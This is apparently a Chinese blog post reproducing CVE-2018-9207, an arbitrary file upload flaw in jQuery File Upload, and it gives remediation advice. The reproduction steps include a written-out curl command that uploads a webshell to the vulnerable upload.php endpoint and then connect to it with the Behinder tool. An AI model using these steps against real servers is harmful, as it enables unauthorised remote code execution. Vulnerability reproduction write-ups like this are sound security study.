提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
CVE-2018-9207 jQuery文件上传漏洞复现
漏洞描述
提示:这里可以添加本文要记录的大概内容:
jQuery file upload是一个文件上传小工具,包含多个文件选择,拖放支持,进度条,验证和预览图像,jQuery的音频和视频。支持跨域、分块和可恢复文件上传以及客户端图像大小调整。适用于任何服务器端平台——支持标准HTML表单文件上传(PHP,Python,Ruby on Rails,Java,Node.js,Go等)。
这个漏洞产生主要是因为jQuery-File-Upload的.htaccess文件会限制文件的上传和文件的执行,但是Apache的2.3.9版本中,Apache默认不再支持.htaccess了,而且默认是没有被开启的,所以导致攻击者可以任意上传脚本文件并执行。如果使用了另一种web容器的话(比如Nginx),那么基于.htaccess文件的保护则完全无效。
提示:以下是本篇文章正文内容,下面案例可供参考
影响范围
jQuery Upload File <= 4.0.2
漏洞复现
1.首先准备好木马shell.php (可以直接使用冰蝎)
2.访问环境:
http://ip:8080/jquery-upload-file/php/upload.php
3.通过curl命令把shell.php上传到服务器
curl -F "myfile=@shell.php" "http://ip:8080/jquery-upload-file/php/upload.php"
4.连接冰蝎进行验证
漏洞修复
更新jQuery file upload至最新版本
https://github.com/blueimp/jQuery-File-Upload
文章参考 http://cn-sec.com/archives/1005715.html ,仅供学习使用!